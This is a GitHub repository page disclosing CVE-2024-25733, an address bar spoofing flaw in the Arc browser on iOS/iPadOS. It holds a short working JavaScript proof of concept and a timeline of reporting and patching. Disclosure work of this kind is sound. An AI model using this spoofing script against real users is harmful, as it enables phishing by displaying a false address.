Skip to content

hackintoanetwork/ARC-Browser-Address-Bar-Spoofing-PoC

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 

Repository files navigation

ARC Browser Address Bar Spoofing - iOS/iPadOS (CVE-2024-25733)

ARC Browser Address Bar Spoofing PoC - iOS/iPadOS

Exploit PoC (Proof of Concept)

<script>
    function spoof() {
        setTimeout(() => {
            window.stop();
            let randomPort;
            do {
                randomPort = Math.floor(Math.random() * 1000);
            } while (randomPort === 0 || randomPort === 443);
            document.location = "https://google.com:" + randomPort + "/";
        }, 300);
    }
    spoof();
</script>

DEMO

PoC.mp4

TimeLine

  • 2024-01-25 : Vulnerability reported to The Browser Company of New York
  • 2024-01-25 : Recognized as a security vulnerability
  • 2024-02-13 : Patched in the latest release

About

CVE-2024-25733 | ARC Browser Address Bar Spoofing PoC - iOS/iPadOS

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published